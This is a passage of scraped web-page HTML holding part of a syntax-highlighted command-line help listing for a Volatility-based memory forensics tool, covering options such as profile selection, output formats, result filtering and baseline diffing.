, 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Volatility </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">profile </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">for</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">the </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">images</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">(</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">e</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">g</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">WinXPSP2x86</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">)</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-18" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">debug </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Print </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">debugging </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">statements</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-19" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">info </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Print </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">available </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">volatility </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">profiles</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">,</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">plugins</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-20" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">tsv </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Print </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">screen </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">formatted </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">output</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-21" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">grepable </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Print </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">in</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">grepable </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">text </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">format</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-22" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">filter </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FILTER </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Filter </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">results </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">on </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">name</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">:</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">value </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">pair</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">,</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">e</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">g</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">,</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">pid</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">:</span><span class="crayon-cn" style="background: transparent; border: 0px; color: rgb(206 , 0 , 0); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">42</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-23" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">filtertype </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">FILTERTYPE</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-24" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Filter </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">match </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">type</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">;</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">either</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-s" style="background: transparent; border: 0px; color: rgb(0 , 128 , 0); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">"exact"</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">or</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-s" style="background: transparent; border: 0px; color: rgb(0 , 128 , 0); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">"partial"</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">,</span></div>
<div class="crayon-line" id="crayon-5661f791a9922714708817-25" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">defaults </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">to</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">partial</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-26" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">--</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">diff </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">BASELINE </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Diff </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">the </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">imageFile</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">|</span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">with </span><span class="crayon-r" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">this</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">db </span><span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">file </span><span class="crayon-st" style="background: transparent; border: 0px; color: rgb(128 , 0 , 128); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">as</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">a</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">baseline</span></div>
